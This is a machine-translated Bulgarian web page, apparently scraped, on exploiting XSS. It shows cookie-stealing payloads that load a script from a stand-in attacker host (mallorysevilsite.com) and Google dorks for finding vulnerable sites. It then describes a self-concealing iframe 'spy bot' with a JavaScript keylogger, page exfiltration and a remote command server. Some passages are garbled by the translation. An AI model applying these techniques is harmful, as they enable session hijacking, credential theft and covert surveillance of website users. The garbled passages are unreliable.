src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>Тези. вече има XSS одитор в браузъра, който ще се опита да предотврати XSS. Firefox все още няма тази функционалност, но предполагам, че е въпрос на време. Ако внедряването в браузърите е успешно, тогава можем да говорим за значителна трудност при използването на XSS.</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>Полезно е да запомните, че съвременните браузъри предприемат стъпки за ограничаване на експлоатацията на проблеми като нестабилен XSS и базиран на DOM XSS. Това също трябва да се помни, когато тествате уебсайтове с помощта на браузър - може да се окаже, че уеб приложението е уязвимо, но не виждате изскачащия прозорец за потвърждение, само защото браузърът го блокира.</p> <h2>Примери за експлоатация на XSS <br></h2> <p>Нападателите, които възнамеряват да експлоатират уязвимостите на скриптове между сайтове, трябва да подходят по различен начин към всеки клас уязвимости. Тук са описани векторите на атака за всеки клас.</p> <p>С уязвимостите на XSS атаките могат да използват BeEF, който разширява атаката от уебсайта към локалната потребителска среда.</p> <p><b>Пример за нестабилна XSS атака</b></p> <p>1. Алис често посещава определен уебсайт, който Боб хоства. Уебсайтът на Боб позволява на Алис да влезе с потребителско име/парола и да запази чувствителни данни като информация за плащане. Когато потребителят влезе, браузърът запазва авторизационни бисквитки, които изглеждат като безсмислени знаци, т.е. и двата компютъра (клиентски и сървър) помнят, че тя е била влязла.</p> <p>2. Малори отбелязва, че уебсайтът на Боб съдържа променлива XSS уязвимост:</p> <p>2.1 Когато посещава страницата за търсене, тя въвежда низа за търсене и щраква върху бутона за изпращане, ако не бъдат намерени резултати, страницата показва въведения низ за търсене, последван от думите "не е намерено" и URL адресът изглежда така <b>http://bobssite.org?q= нейната заявка за търсене</b></p> <p>2.2 С нормална дума за търсене като „ <b>кученца</b>„Страницата просто се показва“ <b>кученца</b>не е намерен "и url http://bobssite.org?q= <b>кученца</b>, което е нормално поведение.</p> <p>2.3 Въпреки това, когато необичайна заявка за търсене се изпрати към търсене като <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 Появява се предупредително съобщение (което казва "xss").</p> <p>2.3.2 Показване на страници <b><script type="text/javascript">alert("xss");</script>не е намерен</b>заедно със съобщение за грешка с текст "xss".</p> <p>2.3.3 използваем URL адрес <b>http://bobssite.org?q=<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Mallory създава URL, за да използва уязвимостта:</p> <p>3.1 Тя прави URL адреса <b>http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>... Тя може да избере да преобразува ASCII знаци в шестнадесетичен формат, като напр <b>http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E</b>за да попречи на хората незабавно да декриптират злонамерения URL адрес.</p> <p>3.2 Тя изпраща имейл до някой нищо неподозиращ член на сайта на Боб, казвайки: "Вижте готините кучета."</p> <p>4. Алис получава писмо. Тя обича кучета и кликва върху връзката. Тя отива в сайта на Боб при търсене, тя не намира нищо, показва "no dogs found", а в средата му се стартира таг със скрипт (той е невидим на екрана), зарежда и изпълнява Mallory's програма authstealer.js (задействане на XSS атака). Алис забравя за това.</p> <p>5. Програмата authstealer.js работи в браузъра на Алис, сякаш произхожда от уебсайта на Боб. Тя грабва копие от бисквитките за разрешение на Алис и ги изпраща на сървъра на Малори, където Малори ги извлича.</p> <p>7. Сега, когато Малори е вътре, тя отива в раздела за плащане на уебсайта, търси нагоре и открадва копие от номера на кредитната карта на Алис. След това тя отива и сменя паролата, т.е. сега Алис дори вече не може да влезе.</p> <p>8. Тя решава да направи следващата стъпка и изпраща така изградената връзка на самия Боб и така получава административните привилегии на сайта на Боб.</p> <p><b>Постоянна XSS атака</b></p> <ol><li>Малори има акаунт в уебсайта на Боб.</li> <li>Малори забелязва, че уебсайтът на Боб съдържа постоянна XSS уязвимост. Ако отидете в нов раздел, публикувате коментар, тогава той показва каквото е написано в него. Но ако текстът на коментара съдържа HTML тагове, тези тагове ще бъдат показани такива, каквито са, и всички скриптови тагове се изпълняват.</li> <li>Малори чете статията в секцията Новини и пише коментар в секцията Коментари. Тя вмъква текста в коментара:</li> <li>В тази история много ми харесаха кучетата. Много са хубави! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>Когато Алис (или някой друг) зареди страницата с този коментар, маркерът на скрипта на Малори се задейства и открадва бисквитките за оторизация на Алис, изпраща го до тайния сървър на Малори за събиране.</li> <li>Малори вече може да пресече сесията на Алис и да се представя за Алис.</li> </ol><h2>Намерете сайтове, уязвими към XSS <br></h2> <p><b>XSS пътища</b></p> <p>Първата стъпка е да изберем сайтовете, на които ще извършваме XSS атаки. Уебсайтовете могат да се търсят с помощта на Google Dorks. Ето няколко от тези глупости, които можете да копирате и поставите в Google Търсене:</p> <ul><li>inurl: search.php? q =</li> <li>inurl: .php? q =</li> <li>inurl: search.php</li> <li>inurl: .php?търсене =</li> </ul><p>Пред нас ще се отвори списък със сайтове. Трябва да отворите сайт и да намерите полета за въвеждане в него, като формуляр за обратна връзка, формуляр за въвеждане, търсене в сайта и т.н.</p> <p>Веднага отбелязвам, че е почти безполезно да се търсят уязвимости в популярни автоматично актуализирани уеб приложения. Класически пример за такова приложение е WordPress. Всъщност има уязвимости в WordPress и особено в неговите плъгини. Освен това има много сайтове, които не актуализират нито двигателя на WordPress (поради факта, че уеб администраторът е направил някои от собствените си промени в изходния код), нито плъгини и теми (като правило това са пиратски плъгини и теми ). Но ако четете този раздел и научите нещо ново от него, тогава WordPress все още не е за вас... Определено ще се върнем към него по-късно.</p> <p>Най-добрите цели са различни персонализирани двигатели и скриптове.</p> <p>Можете да изберете като полезен товар за вмъкване</p><p> <script>alert(1)</script> </p><p>Обърнете внимание в кои HTML тагове попада вашият инжектиран код. Ето пример за типично поле за въвеждане ( <b>вход</b>):</p><p> <input type="text" class="ui-input query" name="q" value="калъфка за възглавница"/><script>alert(1)</script><input value="" /> </p><p>Нашият полезен товар ще отиде там, където сега е думата "калъфка". Тези. превърне в стойност на етикета <b>вход</b>... Можем да избегнем това, като затворим двойните кавички и след това самия таг с <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>Нека го опитаме за уебсайт:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>Отлично, уязвимост съществува</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>Програми за намиране и сканиране на XSS уязвимости <br></h2> <p>Вероятно всички скенери за уеб приложения имат вграден скенер за XSS уязвимости. Тази тема не е изчерпателна, по-добре е да се запознаете с всеки такъв скенер поотделно.</p> <p>Всеки знае от дълго време, че най-често, използвайки XSS, нападателят се опитва да изпрати бисквитка на жертва, да прочете CSRF токени, да извърши фишинг атака (чрез създаване на фалшива форма за вход), да извърши някакво действие от името на потребител и някои други подобни атаки (може би това не са всички възможности, но това са всички най-популярни, известни ми в момента).</p><p>Целта на този метод е да наблюдава страниците от името на потребителя, към който отива в атакувания сайт, както и да следи натисканията му (можете също да премествате и щраквате с мишката, но за мен това ще бъде излишно, не особено полезно информация, в повечето случаи със сигурност) ... <br>Сега за максимална полза - вярвам, че алгоритъмът ще бъде така:</p><ul><li>четене и изпращане на бисквитки;</li><li>прочетете и изпратете останалата информация (IP-адрес, инсталирани плъгини, версия и тип на браузъра, поддръжка за флаш, поддръжка на silverlight и т.н.) [по избор]</li><li>получаваме информация за вътрешната мрежа, пробиваме рутера [по избор]</li><li>четене и изпращане на различни токени [по избор];</li><li>ние прилагаме фишинг [по избор];</li><li>направете нещо с "ръцете" "на потребителя [по избор];</li><li>продължаваме да го шпионираме и да извличаме информация, докато не затвори раздела или не напусне сайта;</li> </ul><p>Всички незадължителни елементи в списъка трябва да се изпълняват в зависимост от ситуацията и конкретни приоритети за целите, които трябва да бъдат постигнати с помощта на XSS, те понякога могат да пречат един на друг (ако се опитате да ги комбинирате, по-точно, един по един) и да се увеличи вероятността от неуспех при експлоатация на XSS. <br>Но във всеки случай винаги трябва да се спазват първата и последната точка.Всъщност основната част на статията ще бъде за последната точка от този списък.</p><h3><u><b>Приближаваме се към целта.</b> </u></h3><p>Ще започна отдалече: чрез JavaScript е възможно да промените пътя в адресната лента, без да презареждате страницата. Например, ако потребителят е заредил страницата на</p><br>След това в адресната лента съдържанието ще стане както следва (без презареждане на страницата): <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http://site.com/new-url/</p> </td> </tr></table><br>Между другото, тази функция понякога е доста полезна, когато е необходимо да се скрие от потребители (или по-внимателна категория потребители - администратори) URL адресът, след като е щракнал върху връзката, съдържаща Reflected XSS, така че по-късно, след зареждане на страницата, гледайки в адресната лента, не намерих нищо. <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http: <span>//site.com/search.php?q=123<script> document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http: <span>//site.com/search.php?q=123<script> window . history . pushState ("" , "" , "/" ) ; document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><br>ще го лишим от тази възможност. <p>Но тази техника има още по-интересни и мощни приложения. Ние ще симулираме престоя на потребителя на сайта, след като щракне върху връзката, всъщност той ще остане на една и съща страница през цялото време и в този момент ще работи скрипт на трета страна, извличайки и изпращайки информация до нападателя. По този начин, <b><u>XSS ще работи, докато потребителят щракне върху връзката в този домейн</u> </b>.</p><h3><u><b>Ние дефинираме идеята.</b> </u></h3><p>Общият принцип на работа е следният: когато потребител посети страница с XSS, скриптът създава iframe със същия адрес като тази страница и го „залепва“ на преден план, потребителят има впечатлението, че страницата се зарежда нормално, защото iframe може да се види само в кодовите страници.</p><p>А спомагателният скрипт контролира логиката на шпионския бот, тоест следи кога адресът се променя в рамката, за да го промени в адресната лента, но ако има различен домейн в новопроменения адрес на рамката, тогава можете да го отворите на нова vlkadka, или ще трябва да презаредите страницата, за да не се изгори. <br>По този начин, за да може XSS да спре да се изпълнява в момента, потребителят трябва или да опресни страницата ръчно (ако XSS е Reflected и е бил предаден по метода POST, в други случаи актуализацията няма да запази, а между другото, някои браузъри сега, когато актуализирате страницата, можете да изпратите отново POST заявката) или да затворите раздела или да преминете към друг домейн (въпреки че в този случай все още можете да избегнете загубата на контрол).</p><p>Ако той отиде в поддомейна на атакувания домейн, тогава изборът на нападателя, тоест XSS, ще работи, но има малък шанс потребителят да види несъответствие между адреса. Мисля, че тук според ситуацията, например, ако домейнът google.ru беше атакуван, потребителят отиде до облачната файлова услуга на Google, която обикновено се намира в поддомейна drive.google.ru, тогава вероятността той ще забележи уловката при гледане на адресната лента е доста висока, <u>ако е използвал тази услуга често</u>... В противен случай можете да рискувате. Но трябва да вземем предвид, че вече няма да можем да четем неговите данни от фрейм с поддомейн, тъй като Политиката за кръстосано начало няма да го позволи. Но можем спокойно да изкачим основния домейн от негово име в скрит режим (по-долу ще бъде повече за това по-подробно).</p><p>Само този метод има ограничения, а именно - няма да работи, ако има заглавка в отговорите на уеб сървъра на сайта <b>Опции за X-Frame</b>със смисъла <b>ОТКАЗВАМ</b>... Но лично аз съм срещал такива сайтове буквално няколко пъти, сега дори половината <b>СЪЩО ПРОИЗХОД</b>не е изложено, да не говорим за пълно ограничаване чрез <i>ОТКАЗВАМ</i>.</p><h3><u><b>Анализиране на идеята.</b> </u></h3><p>Сега мнозина вероятно си спомниха за такова прекрасно нещо като BeEF, което също има много интересни неща. Така че, между другото, има и опция за принудително пренасочване на потребителя в рамката, но адресът в адресната лента не се променя, което може бързо да изгори бюрото и тази опция служи малко за други цели. <br>Като цяло BeEF'e има почти всичко, от което се нуждаете и дори много допълнителни функции, но лично аз исках допълнителна функционалност, а именно:</p><ul><li>възможността за наблюдение на кода на страниците, които са достъпни за атакувания потребител в реално време;</li><li>възможността да гледа всичко, което въвежда на този сайт (от вход и парола, до клавишни комбинации и съобщения), тоест кейлогър на JS;</li><li>възможността да давате JS команди на вашия бот в реално време, след преглед на кода на получените страници;</li><li>възможността да оставяме команди на бота локално, така че той след това да ги „взема“ и да ги изпълнява без наше пряко участие;</li><li>по-малка вероятност ботът да изгори или способността му да се „скрива“ от любопитни очи;</li> </ul><p>Както споменахме по-горе - реших да заимствам от BeEF’е страхотна идея за опашката за изпълнение на команди. Например, анализирахме страниците, които ботът изпусна, когато привилегирован потребител се качи в контролния му панел със съхранен XSS, оставяме командата на бота - JS кода, като следващия път, когато потребителят влезе, натиснете този бутон, напишете това стойност тук и т.н., когато този потребител следва да посети страницата, ботът чете командите и ги изпълнява, а ние изобщо не трябва да сме на негово ръководство - това е много удобно.</p><p>По принцип такъв бот, разбира се, е предназначен за потребители на статус на някои сайтове, които имат допълнителни "лостове" за управление на съдържанието, други потребители и т.н. От заявките за функционалност става ясно, че без сървърната страна не може.</p><h3><u><b>Нека реализираме идеята.</b> </u></h3><p>По принцип можете да пропуснете тази част от статията, тъй като тя просто описва процеса на внедряване на желания бот и някои негови детайли, в случай че някой иска да го преправи или завърши сам. Въпреки че ботът в началото на кода ще има променливи, чрез които можете да зададете някои настройки. <br>Първо, алгоритъмът на действията на бота от момента на зареждане:</p><p>1) Проверка за наличието на заглавка <i>Опции за X-Frame: ОТКАЗВАНЕ</i>(ако има, тогава навийте въдиците); <br>2) Вграждане на рамка и настройка на всички компоненти на бота; <br>3) Премахване на скрипта и всички следи в HTML кода; <br>4) Установяване на контакт със сървърната страна и начало на изпращане на данни, реагиране на отговори (получаване на команди от сървъра);</p><p>Не направих първата точка напълно, тоест ботът проверява само първата страница и главната заглавка. Факт е, че обикновено тези заглавки се вграждат от уеб сървъра за всички страници наведнъж и много рядко всичко се прави „ръчно“ за отделна страница. И самото това заглавие е доста рядко. Е, за второто и третото няма какво особено да се каже, всичко ще е по-ниско.</p><p>Има относително важен момент, че преди да добавите кода на бот скрипт във вашия код, трябва незабавно да се отървете от знаците XSS в адресната лента (от JS кода), тъй като това намалява шансовете за откриване и най-важното, предотвратява рекурсията, която възниква, когато към рамката се добави адрес със същия XSS код, който от своя страна създава друг кадър със себе си и т.н.</p><p>Но за всеки случай кодът на бота реализира възможността за откриване на такава рекурсия на фрейм и предотвратяването й при първия опит за добавяне на рамка към вече създадена, но е по-добре да не разчитате само на нея, а допълнително да изтриете код преди зареждане на кода на бота. Въпреки че все още не съм срещал проблеми.</p><p>Функция за проверка на актуализацията на рамката. Опитах няколко начина за икономично разрешаване на този проблем, като закача манипулатори на събития <i>contentWindow</i>или <i>contentDocument</i>, но нищо не успя, така че трябваше да напиша функция, която да проверява адреса на рамката и да го сравнява с този, запазен преди, и въз основа на това да реша дали рамката се актуализира (дали адресът се е променил) и след това рекурсивно нарече себе си. <br><br>Честотата на такива проверки в секунда се контролира от променлива <i>забавяне</i>, който е посочен в началото на файла с кода на бота. Но по-късно, след като вече го написах, намерих по-ефективно решение - използвайте просто решение и закачете <i>при натоварване</i>на кадър, така че оставих тази функция, но я коментирах, в случай че се окаже по-търсена по-късно.</p><h3><u><b>Изпращане на HTML кода на страницата.</b> </u></h3><p>Тук схемата е доста проста - след всяко презареждане на рамката (включително първото зареждане), ботът изпраща на сървъра целия HTML код на страницата заедно с текущия й адрес, така че по-късно да можете да различите дали кодът принадлежи на необходимите страници.</p><p>Сървърът реализира логиката на съхранение на страници – сървърът за всеки домейн създава папка с името на този домейн и там записваме всички данни. Кодовете на страниците се запазват и постоянно се актуализират до най-новите версии, но всеки нов ден се създава ново копие на страницата, за да можете да контролирате историята на версиите, ако е необходимо. Тоест за <i>/news.php</i>На 1 септември състоянието ще бъде актуализирано, а на 2 септември ще бъде създадено негово копие, подходящо само за този ден и така всеки ден отново (ако потребителят посещава тази страница всеки ден). Името на страницата се състои от датата и пътя към тази страница спрямо корена на сайта (тоест без домейн).</p><h3><u><b>Keylogger в JavaScript.</b> </u></h3><p>Идеята вече е реализирана от някои ентусиасти, но за мен техните разработки не пасваха, дори и само защото повечето от тях бяха доста прости, тоест откриха кода на натиснатия клавиш и чрез <i>String.fromCharCode</i>преведени в символи. Но този метод има редица недостатъци - контролни клавиши като shift, control, интервал и т.н., не се превеждат в никаква форма (често просто празен знак), взаимодействието на буквено-цифрови клавиши с клавиша shift се регистрира неправилно, тъй като това трябва да се реализира програмно, а също така всички натиснати клавиши се показват с главни букви, което също може да се коригира програмно.</p><p>В резултат на това получихме кейлогър, който правилно откри всички клавиши с цифри, букви и основни знаци, работейки и върху двете оформления, реагирайки на смяната и регистрирайки всички основни специални клавиши. Вярно е, че някои знаци (в горната част на цифровия ред, които се отпечатват при натискане на смяната и номера) на някои машини може да се различават, тъй като са внедрени според основния стандарт, който някои компании променят за някои. <br>Всяка част от натиснатите знаци се запазва от клиента, докато текстовият елемент загуби фокус. Освен това тази част се изпраща на сървъра, където се записва в текстов файл, който също ще се създава всеки ден с ново копие, така че да няма нарастване до големи размери и да можете бързо да намерите това, което потребителят пише в такъв момент. <br>В допълнение към самите ключове, информация за елемента, в който е въведен текстът, се изпраща на сървъра с всяка част (т.е. <i><input>, <textarea>[ </i>или някои <i><body> </i>когато потребителят е използвал бързи клавиши), освен името на елемента, се изпращат и неговите основни данни (идентификатор, име, клас - ако присъстват), за да може лесно да бъде намерен в кода. И разбира се, се записват адресът на страницата, на която е имало набор, и приблизителното време на този набор. Като цяло информацията за потребителя, който чука по клавиатурата, се изпраща достатъчно за последващия й анализ.</p><h3><u><b>Командвайте своя бот.</b> </u></h3><p>Този процес може да се извърши от нападател или от страната, където е стартирана сървърната част на бота, или дори дистанционно. След стартиране на скрипта на сървъра стартира самонаписан миниатюрен уеб сървър, който обслужва заявките на бота и неговия контролер, който работи през уеб интерфейса. Тоест, след стартиране, уеб сървърът издава връзка, като щракнете върху която можете да започнете да давате команди на бота.</p><p>Относно този контролен панел. Първо, беше необходимо да го ограничите с парола (пътят и малко хора ще знаят за работещата услуга на такъв и такъв порт или за адреса, на който трябва да влезете, за да използвате тази услуга), така че на първо влизане сървърът ще поиска парола, която се предоставя в адресната лента (ще бъде предоставен пример), оригиналната парола се съхранява в <i>password.txt</i>това може да бъде променено. След първото посещение уеб сървърът ще инструктира браузъра да запази паролата в бисквитка, така че вече не е нужно да се притеснявате за това.</p><p>На страницата за изпращане на команди към самия бот има и информация за състоянието на бота - дали е онлайн или офлайн в момента и няколко настройки, първата от които е хостът, т.е. IP адрес или домейн на сайта, към който ще се изпращат командите на бота. Това е проектирано в случай, че няколко сайта ще съдържат този бот, така че да могат да бъдат идентифицирани. На сървъра, също за този случай, всички данни се разделят в папки с имена на домейни. <br>Следва прозорецът, в който можете да пишете команди на бота в JS и опцията, която задава къде ще се изпълнява този JS код, в главния прозорец, където седи ботът или в рамка - това се прави за удобство, за всеки случай .</p><p>Ако ботът не е онлайн, тогава сървърът просто запазва командите и по-късно, когато ботът влезе онлайн, тоест потребителят отново посети страницата с него или следва връзката на нападателя - тези команди ще бъдат изпълнени. <br>Това е много удобно, ако по време на първото проучване ботът изхвърли всички страници, посетени от потребителя (например личен акаунт), като проучи кода, от който направихме команди в JS, така че по-късно ботът да щракне на връзките, от които се нуждаем, въведете необходимите данни, покажете необходимите снимки и т.н., което ще помогне за постигането на поставената цел.</p><p>Или можете директно в реално време, бързо да прегледате съдържанието на страниците чрез кода и да дадете на бота команди да изпрати кода на други страници, да отидете на друг адрес и т.н. И всичко това ще стане „зад екрана“ от потребителят, който спокойно ще сърфира на място през рамката.</p><p>За ваше удобство можете да оформите най-често използваните инструкции в цели функции в JS, които след това въвеждат ботовете в изходния файл ( <i>xsb.js</i>, файловата структура ще бъде разгледана по-долу) и използвайте. Или използвайте тези от функциите, които са вградени в бота, въпреки че има само основата и няма нищо ново, но например можете да използвате функцията за изпращане на кода на страницата по всяко време, а не при презареждане на рамката . Можете да напишете функция, която ще отваря предадените към нея връзки в нови рамки във фонов режим, за да преглежда съдържанието на няколко страници от името на потребителя (и да управлява това съдържание с неговите виртуални ръце).</p><h3><u><b>Премахване на собствен код.</b> </u></h3><p>Е, последната функция е реализирана доста просто (може да бъде деактивирана, като зададете желаната променлива във файла, те се коментират). Скриптът, след като настрои и закачи всички манипулатори на събития, създаде всички променливи и функции, се изтрива</p><p>В крайна сметка всички данни вече са заредени в RAM през браузъра, така че няма за какво да се притеснявате, но това е на теория, може би по-късно ще има някои проблеми, които не взех предвид, затова дадох променлива които могат да бъдат деактивирани при необходимост.</p><p>След като премахнете всички скриптове, ще бъде изключително трудно да забележите XSS, тъй като наличието на рамка не говори за това по-скоро косвено, а самият код може да бъде намерен само в регистрационните файлове на историята на мрежовия трафик на браузъра (които не са запазва се по подразбиране в много браузъри, ако панелът за програмисти не е отворен) ...</p><h3><u><b>Сървърна част.</b> </u></h3><p>За по-лесен и удобен начин за стартиране на бота беше решено да напиша собствен малък уеб сървър на сокети, които да обслужват бота, да осигуряват всички операции за получаване и поставяне на изпратените данни, да предават съобщения между нападателя и бота, и създайте уеб интерфейс за командване на нападателя... <br>Сървърът беше написан на python, опитах се да използвам само стандартни библиотеки, за да не се налага да инсталирам нищо преди да го стартирам. Освен това самият сървър редактира някои данни в скриптовете, тоест в JS скрипта на бота, не е необходимо да задавате адреса на командния сървър, самият уеб сървър ще постави необходимия там, когато стартира. В конфигурацията на сървъра има само един параметър - портът, от който ще стартира (по подразбиране 8000). <br>След стартиране сървърът ще покаже всички необходими данни - връзка към JS скрипт, който ще трябва да бъде подхванат, връзка към командния панел или, по-точно, връзки към външни и локални адреси, за удобство.</p><h3><u><b>Схема за работа с бот.</b> </u></h3><p>Стартираме сървъра на някакъв непотърсен порт и можете да изпратите линк със скрипт на бот, след което всеки, който го следва, ще ви изпрати данни, които сървърът ще запази по всяко време на деня. След това можете просто да ги прегледате, ако има нужда да оставите екипа на бота и да продължите да се занимавате с работата си.</p><h3><u><b>Файлова структура.</b> </u></h3><p>Папката съдържа следните файлове:</p><ul><li><b>xsb.py</b>- основният файл, който реализира сървърната страна, за да го стартира ботът и след това просто да използва връзката, предлагана от него;</li><li><b>xsb.js</b>- тук се съхранява JS кодът на бота, връзката към който се издава от сървъра, в началото му се декларират конфигурационни променливи, които могат да се променят по ваша преценка (някои, а именно хост и порт, сървърът ще изложи по-късно, не е нужно да се притеснявате);</li><li><b>панел.html</b>- от тук сървърът взема кода за контролния панел на бота, можете да настроите интерфейса по ваша преценка;</li><li><b>password.txt</b>- тук се съхранява паролата от контролния панел, която може да се променя;</li><li><b>savedData</b>- това е директория, в която ще се създават папки с домейни на сайта, в която ще се съхранява цялата информация.</li> </ul><p>Още веднъж отбелязвам това във файла <i>xsb.js</i>можете да добавяте свои собствени функции, които след това се извикват през панела, без да пишете огромни части от код;</p><h3><u><b>Малък анализ на резултатите.</b> </u></h3><p>След като написах моя собствен измислен начин за задържане на потребител на страница с XSS чрез рамки (е, като изобретен - аз лично го открих за себе си, напълно възможно е някой друг да е „измислил“ тази техника за себе си или е като цяло вече блесна някъде в обществото, защото сега е доста трудно да се разработи нещо наистина ново и като правило след известно време откривате, че „това вече беше в Симпсън“) Започнах да се ровя в BeEF по-подробно и прочетете уикито му. Тогава открих, че там е внедрена друга техника за постигане на същата цел - удължаване на времето на потребителя на страницата с изпълнимия XSS (който беше извикан там <i>човек в браузъра</i>). И беше реализирано по следния начин: всички връзки на първоначалната страница се промениха по такъв начин, че при щракване върху някоя от тях, скриптът не презареди страницата, а чрез Ajax изпрати заявка до сървъра и вмъкна получените данни в отговор, тоест може да се каже, че го актуализира изкуствено, което също беше почти неразличимо от редовното опресняване.</p><p>Затова не бях първият, който реализира тази идея (дори методите да бяха различни). Но и двата метода имат своите недостатъци:</p><p>Метод за качване чрез <iframe>не работи, ако има заглавие в отговора <i>Опции за X-Frame: ОТКАЗВАНЕ</i>, но иначе оре като обикновен прозорец на браузъра;</p><p>Методът ajax винаги работи, ако браузърът го поддържа (сега всички основни браузъри го поддържат), но с новия стандарт Web 2.0 все повече и повече преходи се задействат от персонализирани събития на всякакви елементи чрез JS. Веднъж отидох в Google AdWords и реших да видя как техните HTML и JS взаимодействат там, защото всичките ми паяци бяха изключително лоши в създаването на карта на тази услуга. И цяла вечер тихомълком се прецаках колко не беше познато там, когато текстовите елементи бяха бутони и превключватели и плъзгачи и на какво не бяха изобразени и всеки имаше около 30 манипулатори за различни събития.</p><p>Тоест на изискан сайт бутонът за преход (субективно връзка) ще бъде реализиран чрез обикновен маркер <i><span> </i>, който е зареден със стилове и на който са окачени манипулатори на събития, един от които, напр. <i>onclick пренасочва потребителя към друга страница. Има и стандартни елементи като [i] <input type=button> </i>или себе си <i><button> </i>и така нататък, които всъщност също са връзки към други страници, но на които BeEF няма да отговори и страницата просто няма да се актуализира, когато се щракнат повечето бутони и други елементи. Което може да подкани потребителя да опресни страницата или да посети отново „от другата страна“, което убива нашата активна XSS сесия.</p><p>За краткост на именуването на файловете го кръстих Xss Spy Bot.</p><p>P.S. <br>Писането на цялото нещо отне малко повече от месец поради периодичната липса на време и постоянните разсейвания. Също така поради това качеството на кода и вероятността да се сблъскате с някаква грешка е доста висока. Затова те моля да не псуваш много, а да се отпишеш какво не е наред с някого, за да го оправиш. <br>Аз самият тествах бота само на 4 машини, всички имат Debian.</p><p>В дългосрочните планове за този бот, ако има мотивация: <br>- да имплементира изобразяването на кода на страниците, които ботът изпраща на сървъра, така че той да се отваря веднага в браузъра и да може да бъде „почувстван“, тестван в движение; <br>- ще се опитат да хванат благините от технологията WebRTC, тоест да намерят начини да получат нова информация, която не може да бъде изтеглена с чист JS; <br>- осъществяване на комуникация между бота и сървъра с помощта на протокола WebSocket през HTTP; <br>- добавете някои удобства към контролния панел;</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </div> </div> </article> <script> var send_pid_view = 10902; </script> <div class="entry-meta-niz">Заглавие: <a href="https://shongames.ru/bg/category/windows-7/" title="">Windows 7</a> </div> <div class="fonts20">Споделя това</div> <script type="text/javascript" src="//yandex.st/share/share.js" charset="utf-8"></script> <div class="yashare-auto-init b-share_theme_counter" data-yasharel10n="ru" data-yasharequickservices="vkontakte,facebook,odnoklassniki,twitter,moimir,yaru,gplus" data-yasharetheme="counter" data-yasharetype="middle"></div> <div class="zem_rp_wrap zem_rp_th_vertical" id="zem_rp_first"><div class="zem_rp_content"><div class="related_post_title">Публикации по тема</div><ul class="related_post zem_rp"> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bg/program/aptechnye-seti-dolya-rynka-marketmedia-izuchil-kakie-aptechnye-seti/" class="zem_rp_thumbnail"><img src="/uploads/25941b1f22a6678c8ae0899aa77e891a.jpg" alt="MarketMedia проучи кои аптечни вериги в Русия са включени в десетте най-големи по брой търговски обекти" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bg/program/aptechnye-seti-dolya-rynka-marketmedia-izuchil-kakie-aptechnye-seti/" class="zem_rp_title">MarketMedia проучи кои аптечни вериги в Русия са включени в десетте най-големи по брой търговски обекти</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bg/iron/tonometry-ei-end-di-kupit-tonometry-osnovnye-tipy-tonometrov-and/" class="zem_rp_thumbnail"><img src="/uploads/98814cbae4539759255fd9e881327a4b.jpg" alt="Апарати за кръвно налягане hey and dee buy" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bg/iron/tonometry-ei-end-di-kupit-tonometry-osnovnye-tipy-tonometrov-and/" class="zem_rp_title">Апарати за кръвно налягане hey and dee buy</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bg/windows-7/kak-otklyuchit-vse-platnye-uslugi-na-mts-sposoby-otklyucheniya-platnyh-uslug-na-mts/" class="zem_rp_thumbnail"><img src="/uploads/28a9b70efb472e171d4f24835fcc52b7.jpg" alt="Начини за деактивиране на платени услуги на mts Как да деактивирате всички услуги на руски mts" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bg/windows-7/kak-otklyuchit-vse-platnye-uslugi-na-mts-sposoby-otklyucheniya-platnyh-uslug-na-mts/" class="zem_rp_title">Начини за деактивиране на платени услуги на mts Как да деактивирате всички услуги на руски mts</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bg/iron/spravochnaya-sluzhba-podderzhki-mts-goryachaya-liniya-mts-sluzhba/" class="zem_rp_thumbnail"><img src="/uploads/1faf869774706012e4d55b4c89dc4a0c.jpg" alt="Обслужване на гореща линия на Mts Отдел за корпоративни клиенти mts" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bg/iron/spravochnaya-sluzhba-podderzhki-mts-goryachaya-liniya-mts-sluzhba/" class="zem_rp_title">Обслужване на гореща линия на Mts Отдел за корпоративни клиенти mts</a></li> </ul></div></div> <div class="comments"> </div> </div> <aside class="col-4 sidebar"> <ul> <li id="recentcomments" class="widget widget_recentcomments"> <div class="widgettitle">Нови материали</div> <ul> <li><a 